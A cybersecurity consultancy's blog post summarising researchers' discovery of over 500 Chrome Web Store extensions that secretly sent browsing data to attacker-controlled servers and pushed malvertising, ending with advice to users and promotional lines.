Cyber Security researchers recently reported that more than 500 browser extensions that are downloaded millions of times from Google’s Chrome Web Store surreptitiously uploaded private browsing data to attacker-controlled servers.
Jamila Kaya (an independent researcher), found that these extensions were part of a long-term malware attack. Along with the researchers from CISCO (a US technology company best known for networking services &products), Jamila at first found 71 Chrome web Store extension that had about 1.7 million downloads. They reported their findings to Google. Later, 430 more extensions were identified. Google then removed all the reported extensions.
Kaya and Duo Security’s information security engineer, Jacob Rickerd wrote in a report -,“In the case reported here, the Chrome extension creators had specifically made extensions that obfuscated the underlying advertising functionality from users. This was done in order to connect the browser clients to a command and control architecture, exfiltrate private browsing data without the users’ knowledge, expose the user to the risk of exploit through advertising streams, and attempt to evade the Chrome Web Store’s fraud detection mechanisms.”
These extensions primarily presented as tools that provided varieties of promotion and advertising-as-a-service utilities. The hackers to carry out activities like ad fraud and malvertising, introduced the infected browsers through a maze of sketchy domains. Each plug at first linked to a domain that used the same name as the real plugins to check for instructions on whether to uninstall themselves. The plugins then diverted browsers to one of a handful of hard-coded control services to receive additional instructions, advertisements, locate the data where to place, and domains for future redirects. Most of the redirections led to benign ads for products from Dell, Macy’s, and Best Buy.
Hackers infect the scheme by introducing a large number of ad contents. If the ad once clicked it redirect streams to send infected browsers to phishing and malware sites. For example:
- 1. ARCADEYUMGAMES.ese, this reads terminal service related keys and access sensitive data and information from the local browses.
- 2. MapsTrek.exe, this is capable to open the clipboard.
Cyber security researchers noted that the campaigns have been operating since January 2019 and gradually increased (particularly from April). These 500 plugins seemed to be different and all contained almost identical source code, with the extension of the uncommon function names.
Google thanked the researchers for reporting them their findings.
The latest discovery showed that the majority of installation affected Chrome users, some Firefox also got affected. Nacho Analytics, the business that gathered the data and also carefully marked it, closed down adhering to the Ars protection of the procedure.
The finding of such malicious and fraud browser extension is an alarm to the people that they should be cautious when installing any tools and use them only when they provide true benefits. It is always preferable to read user reviews to check the reports of such suspicious behavior before installing. If it is already installed then we as a cyber security consultancy suggest you recognize them and remove it immediately.
Leave a Comment:
Get Exclusive Cyber Security Tips On:
Prevention from damage dealt to an organization’s reputation.
Investments on fixing the issues caused by attack.
Preventing confidential data and Intellectual Property being stolen
Prevention of revenue loss due to service disruption and much more.